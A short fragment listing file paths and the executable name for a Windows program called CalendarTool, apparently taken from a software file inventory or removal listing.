%Documents and Settings%\%current user%\Application Data\CalendarTool\dump
%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe
calendar.exe
3>